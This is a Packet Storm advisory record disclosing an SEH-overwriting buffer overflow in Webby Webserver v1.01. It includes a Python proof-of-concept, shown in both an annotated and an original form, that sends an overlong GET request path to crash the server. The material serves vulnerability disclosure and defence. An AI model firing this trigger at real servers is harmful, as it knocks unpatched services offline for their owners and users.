ID PACKETSTORM:89942
Type packetstorm
Reporter Michael Messner
Modified 2010-05-26T00:00:00
Description
`---------------------------------------------
Webby Webserver v1.01
- Buffer overflow vulnerability with overwritten structured exception handler (SEH)
Date: 25.05.2010
---------------------------------------------
- Description
Webby is a small webserver for the windows operating system.
- buffer overflow vulnerability
The vulnerability can be triggered by sending a specially crafted HTTP GET request with an overlong request path. The payload of the attached PoC overwrites the SEH record with NOP bytes (0x90).
- Solution
No known solution available.
No contact details for the author of the software were found.
- Credits
The vulnerability was discovered by Michael Messner from Integralis
michael#dot#messner#at#integralis#dot#com
- Timeline
25.05.2010 - Vulnerability discovered
- Reference
Download vulnerable software
http://www.shareware.de/webby-webserver/
- POC
#!/usr/bin/python
import socket
import sys
import os.path
import time
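# Proof-of-concept trigger for the Webby Webserver v1.01 request-path overflow
# described in the advisory text. This is a Python 2 script: the request is
# built as a byte string (str) and handed straight to socket.send().
#
# Usage: webby.py <IP> <port>

# Both the address and the port are read below, so three argv entries are
# required. The original test (< 2) let a missing port fall through to an
# IndexError instead of the usage message.
if len(sys.argv) < 3:
    print("Usage: webby.py <IP> <port>")
    sys.exit(0)

ips = sys.argv[1]
port = int(sys.argv[2])

# Request-path filler, 899 bytes in total: 790 x "A", 4 x 0x90, 105 x "B".
# The advisory states that this overwrites the SEH record with the 0x90 bytes.
# The buffer is filler only and carries no shellcode.
# For defenders: the observable artefact is a GET request line whose path is
# far longer than any legitimate URL for this server, which a request-URI
# length limit on a fronting proxy or an IDS rule can key on.
string = "A" * 790
string += "\x90" * 4
string += "\x42" * 105

method = "GET"
print("starting POC for: %s" % ips)
print("")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    try:
        s.connect((ips, port))
    except socket.error:
        # Only connection failures are reported here; a bare except would
        # also have swallowed KeyboardInterrupt and programming errors.
        print("no connection possible")
        sys.exit(1)

    # Absolute-URI request line followed by the blank line that ends the
    # HTTP/1.0 header section.
    payload = method + ' http://' + ips + '/' + string + ' HTTP/1.0\x0d\x0a\x0d\x0a'

    print("\r\nsending payload")
    print("\n\rusing methode %s with buffersize of: %s" % (method, str(len(string))))
    print("...")

    print(payload)
    s.send(payload)
    print("finished with method %s and payload %s" % (method, payload))
    # The result is verified out of band by inspecting the server process.
    print("... check SEH")
finally:
    # Release the socket on every exit path, including the sys.exit above.
    s.close()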
`
{"type": "packetstorm", "published": "2010-05-26T00:00:00", "reporter": "Michael Messner", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "ff747716ac85d4afe083f861caf3a1a9"}, {"key": "modified", "hash": "b42c3d7c50efa70bd986544cd93fb1fe"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "b42c3d7c50efa70bd986544cd93fb1fe"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ed3c0a8702555b117e82620dda0d708a"}, {"key": "sourceData", "hash": "d8cf475705a57bb6a242520f8a6e0e8f"}, {"key": "sourceHref", "hash": "e55b4dffc71fcefab638cfbf6cd2f40f"}, {"key": "title", "hash": "0e524d59ecd141d20c4ba97334327c29"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`--------------------------------------------- \n \nWebby Webserver v1.01 \n- Buffer overflow vulnerability with overwritten structured exception handler (SEH) \nDate: 25.05.2010 \n \n--------------------------------------------- \n \n- Description \n \nWebby is a small webserver for the windows operating system. \n \n- buffer overflow vulnerability \n \nThe vulnerability can be triggered by sending a specially crafted HTTP GET request. Payload of the attached POC overwrites the SEH with NOPs. \n \n- Solution \n \nNo known solution available. \nNo contact details of the author found. 
\n \n- Credits \n \nThe vulnerability was discovered by Michael Messner from Integralis \nmichael#dot#messner#at#integralis#dot#com \n \n- Timeline \n \n25.05.2010 - Vulnerability discovered \n \n- Reference \n \nDownload vulnerable software \nhttp://www.shareware.de/webby-webserver/ \n \n- POC \n \n#!/usr/bin/python \n \nimport socket \nimport sys \nimport os.path \nimport time \n \nif len(sys.argv) < 2: \nprint \"Usage: webby.py <IP> <port>\" \nsys.exit(0) \n \nips = sys.argv[1] \nport = int(sys.argv[2]) \n \nstring = \"A\"*790 \nstring += \"\\x90\"*4 \nstring += \"\\x42\"*105 \n \nmethod = \"GET\" \nprint \"starting POC for:\", ips \nprint \"\" \n \ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM) \ntry: \nconnect=s.connect((ips, port)) \nexcept: \nprint \"no connection possible\" \nsys.exit(1) \n \npayload = method + ' http://'+ ips + '/' + string + ' HTTP/1.0\\x0d\\x0a\\x0d\\x0a' \n \nprint \"\\r\\nsending payload\" \nprint \"\\n\\rusing methode %s with buffersize of: %s\" % (method,str(len(string))) \nprint \"...\" \n \nprint payload \ns.send(payload) \nprint \"finished with method %s and payload %s\" % (method,payload) \nprint \"... check SEH\" \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:28:16", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/89942/Webby-Webserver-1.01-Buffer-Overflow.html", "sourceHref": "https://packetstormsecurity.com/files/download/89942/webby-overflow.txt", "title": "Webby Webserver 1.01 Buffer Overflow", "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2016-11-03T10:28:16"}, "dependencies": {"references": [], "modified": "2016-11-03T10:28:16"}, "vulnersScore": 0.7}, "references": [], "id": "PACKETSTORM:89942", "hash": "a8bea79f996408678118f3fd2c9b930ab0cfd450aff7922246bbfba04c7393fa", "edition": 1, "cvelist": [], "modified": "2010-05-26T00:00:00", "description": ""}
{}